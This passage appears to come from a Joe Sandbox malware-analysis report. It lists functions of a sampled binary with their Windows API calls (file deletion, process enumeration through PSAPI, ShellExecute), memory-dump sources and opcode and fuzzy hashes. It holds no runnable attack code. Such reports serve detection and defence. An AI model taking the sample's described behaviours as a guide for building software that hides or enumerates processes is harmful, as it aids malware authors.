                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                                                                  • Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                                                                                                                                                  • Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
                                                                                                                                                                                  • Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                                                                                                                                                  • Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E
                                                                                                                                                                                  Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FilePointer
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 973152223-0
                                                                                                                                                                                  • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                                                                                                                                  • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                                                                                                                                                                                  • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C
                                                                                                                                                                                  Function 00403D98 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                                                                  • Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                                                                                                                                                  • Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                                                                                                                                                  • Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08
                                                                                                                                                                                  Function 00403D85 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CallbackDispatcherUser
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2492992576-0
                                                                                                                                                                                  • Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                                                                                                                                                  • Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08

                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                  Function 0040497C Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                                                                                                                                                                  • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                                                                                                                                                                  • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                                                                                                                                                                  • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                                                                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                                                                                                                                                                  • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                                                                                                                                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                                                                                                                                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                                                                                                                                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00404A79
                                                                                                                                                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                                                                                                                                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                                                                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                                                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                                                                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                                                                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                                                                                                                                                                  • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                                                                                                                                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                                                                                                                                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                                                                                                                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                                                                                                                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                                                                                                                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                                                                                                                                                                  • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 00404DAC
                                                                                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                                                                                                                                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                                                                                                                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                                                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                                                                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 00404F49
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                                                                                                                                                                  • ShowWindow.USER32(00000000), ref: 00404F5B
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                  • String ID: $ @$M$N
                                                                                                                                                                                  • API String ID: 1638840714-3479655940
                                                                                                                                                                                  • Opcode ID: d31232896a0766ad2925f7f8dcaf29c8f657193e0fe6649208ba40017519f6b3
                                                                                                                                                                                  • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                                                                                                                                                                  • Opcode Fuzzy Hash: d31232896a0766ad2925f7f8dcaf29c8f657193e0fe6649208ba40017519f6b3
                                                                                                                                                                                  • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                                                                                                                                                                  Function 00406ED2 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                                                                                                                                                                  • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                                                                                                                                                                  • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                                                                                                                                                                  • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 004071E6
                                                                                                                                                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                                                  • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                                                  • API String ID: 1916479912-1189179171
                                                                                                                                                                                  • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                                                                                                                                  • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                                                                                                                                                                  • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                                                                                                                                                                  Function 00406C9B Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 190filestringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                                                                                                                                                                  • lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
                                                                                                                                                                                  • lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
                                                                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 00406D2C
                                                                                                                                                                                  • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                                                                                                                                                                  • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                                                                                                                                                                  • FindClose.KERNEL32(?), ref: 00406E33
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                                                                                                                                                                  • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                                                                                                                                                                  • \*.*, xrefs: 00406D03
                                                                                                                                                                                  • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                                                                                                                                                                  • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                                                                                                                                                                  • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                                                                                                                                                                  • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                                                                                                                                                                  • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                  • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                                                                                                                                                                  • API String ID: 2035342205-3294556389
                                                                                                                                                                                  • Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                                                                                                                                                  • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                                                                                                                                                                  • Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                                                                                                                                                                                  Function 004063AC Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                                                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 004063CC
                                                                                                                                                                                  • GetVersionExW.KERNEL32(?), ref: 0040642A
                                                                                                                                                                                    • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                                                                                                                                                                  • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 004064DD
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                                                                  • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                                                                  • API String ID: 20674999-2124804629
                                                                                                                                                                                  • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                                                                                                                                  • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                                                                                                                                                                                  • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                                                                                                                                  • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
                                                                                                                                                                                  Function 004040B8 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                                                                                                                                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                                                                                                                                                                  • GetSysColor.USER32(?), ref: 004041AF
                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                                                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 004041D6
                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                                                                                                                                                                    • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                                                                                                                                                                    • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                                                                                                                                                                    • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                                                                                                                                                                  • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                                                                                                                                                                  • SendMessageW.USER32(00000000), ref: 00404251
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                                                                                                                                                                  • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 004042D2
                                                                                                                                                                                  • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 004042F6
                                                                                                                                                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                                                                                                                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
